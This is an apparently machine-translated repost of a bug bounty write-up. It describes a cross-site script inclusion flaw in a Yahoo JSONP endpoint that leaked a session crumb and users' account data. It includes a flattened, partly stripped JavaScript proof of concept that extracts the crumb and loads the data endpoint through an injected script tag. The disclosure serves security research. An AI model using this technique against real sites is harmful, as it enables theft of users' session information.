Shulou(Shulou.com)05/31 Report--

This article shows you an example analysis of the discovery of Yahoo XSSi loopholes to achieve user information theft, the content is concise and easy to understand, it will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

The discovery of a particular type of vulnerability consists of two key parts, that is, the awareness of the vulnerability and the ease of mining. Cross-site scripting contains vulnerabilities (XSSi) are not mentioned in the accepted security standard OWASP TOP 10, and there are no publicly available tools. But its impact involves personal storage information disclosure, token protection mechanism bypass and account hijacking and so on. At present, due to the widespread existence of XSSi vulnerabilities and the lack of effective detection methods, the harm of vulnerabilities increases. Next I will share a Yahoo XSSi loophole that I found, which can be used to steal information from Yahoo users.

Clue

While participating in the Yahoo (YHOO) vulnerability testing project, I came across the following request when I was using BurpSuite for packet capture analysis:

After I discovered that this was a JSONP server, I immediately realized that this might create a XSSi vulnerability (cross-site scripting included). In Yahoo's website API, the .crumb value is actually a random string related to the user's session and authentication values. I noticed that if the GET parameter .crumb value is invalid in the request, the response is as follows:

Utilization

Now, I think, if you can steal the victim's valid .crumb value in some way, then you can steal the other person's specific account information value. So I looked for all requests containing valid .crumb values in BurpSuite's grab package, and eventually I found such information in some dynamic Javascript file located in https://messenger.yahoo.com/embed/app.js. If you check this Javascript file now, you will find that its logoutCrumb value has been deleted and fixed. When I first found it, the source code was as follows:

Now, the principle of XSSi vulnerability is like this, it allows attackers to bypass the original boundaries to steal specific types of data, using the src attribute of tags to break through the same origin policy (SOP), that is, in tags, browsers do not prevent web pages from loading third-party resources such as images and text. Therefore, in order to steal the valid callback .crumb value in https://messenger.yahoo.com/embed/app.js, and then place it in the link https://jsapi.login.yahoo.com/w/device_users?.crumb=POR1.kRjsx to request to get the session information of the relevant user, I wrote the following PoC code:

Yahoo XSSi PoC Proof of Concept Dataset 1: Dataset 2: function processDeviceUsers (data) {document.getElementById ("content1") [xss_clean] = JSON.stringify (data) } _ window.onload = function () {var config = {}; config_data = {}; config.merge = function (data) {config_data = data}; iris.initConfig (config); document.getElementById ("content2") [xss_clean] = JSON.stringify (config_data) Var src = "https://jsapi.login.yahoo.com/w/device_users?.crumb=" + config_data.session.logoutCrumb; var s = document.createElement ('script'); s.setAttribute (' src', src); document.body.appendChild (s);}

The following is the result of the test:

The above content is an example analysis of the discovery of Yahoo XSSi vulnerabilities to achieve user information theft. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.